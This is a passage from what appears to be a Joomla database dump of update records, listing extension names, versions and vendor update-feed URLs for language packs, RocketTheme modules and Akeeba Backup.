NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18434,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18435,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18436,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18437,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18438,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18439,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18440,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18441,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18442,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18443,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18444,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18445,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18446,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18447,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18448,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18449,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18450,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18451,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18452,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18453,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18454,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18455,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18456,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18457,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18458,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18459,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18460,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18461,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18462,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18463,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18464,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18465,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18466,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18467,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18468,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18469,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18470,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18471,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18472,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18473,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18474,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18475,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18476,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18477,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18478,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18479,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18480,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18481,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18482,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18483,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18484,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18485,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18486,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18487,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18488,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18489,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18490,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18491,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18492,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18493,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18494,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18495,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18496,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18497,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18498,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18499,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18500,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18501,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18502,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18503,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18504,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18505,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18506,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18507,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18508,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18509,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18510,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18511,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18512,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18513,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18514,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18515,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18516,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18517,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18518,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18519,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18520,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18521,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18522,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18523,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18524,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18525,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18526,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18527,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18528,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18529,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18530,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18531,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18532,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18533,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18534,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18535,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18536,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18537,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18538,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18539,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18540,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18541,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18542,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18543,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18544,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18545,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18546,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18547,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18548,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18549,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18550,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18551,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18552,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18553,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18554,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18555,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18556,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18557,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18558,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18559,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18560,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18561,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18562,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18563,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18564,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18565,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18566,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18567,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18568,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18569,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18570,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18571,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18572,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18573,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18574,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18575,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18576,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18577,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18578,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18579,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18580,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18581,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18582,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18583,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18584,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18585,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18586,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18587,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18588,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18589,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18590,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18591,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18592,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18593,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18594,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18595,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18596,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18597,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18598,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18599,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18600,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18601,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18602,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18603,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18604,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18605,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18606,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18607,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18608,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18609,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18610,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18611,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18612,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18613,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18614,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18615,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18616,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18617,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18619,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18620,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18621,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18622,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18623,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18624,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18625,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18626,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18627,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18628,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18629,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18630,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18631,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18632,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18633,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18634,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18635,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18636,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18637,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18638,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18639,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18640,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18641,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18642,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18643,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18644,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18645,67,0,'Akeeba Backup Core 